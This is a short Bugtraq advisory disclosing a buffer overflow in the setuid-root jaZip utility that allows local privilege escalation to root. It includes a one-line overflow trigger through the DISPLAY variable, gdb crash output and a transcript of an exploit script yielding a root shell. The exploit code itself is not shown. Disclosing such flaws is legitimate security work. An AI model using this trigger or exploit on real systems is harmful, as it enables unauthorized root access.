[ SOURCE: http://www.secureroot.com/security/advisories/9795693921.html ] Dear, Bugtraq. jaZip is a program for managing an Iomega Zip or Jaz drive. It is often installed setuid root - and because of a buffer overflow it is possible for regular users to become root. Please excuse me if this was know. Please note that I can not guarantee that this information is correct. Tested rpm: ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/ RPMS/jaZip-0.32-2.i386.rpm [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'` [root@localhost /root]# gdb /usr/X11R6/bin/jazip GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. (gdb) r Starting program: /usr/X11R6/bin/jazip Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () ---- [teleh0r@localhost teleh0r]$ rpm -q jaZip jaZip-0.32-2 [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl Address: 0xbffff7ac bash# Exploit attached. Sincerely yours, teleh0r -- To avoid criticism, do nothing, say nothing, be nothing. -- Elbert Hubbard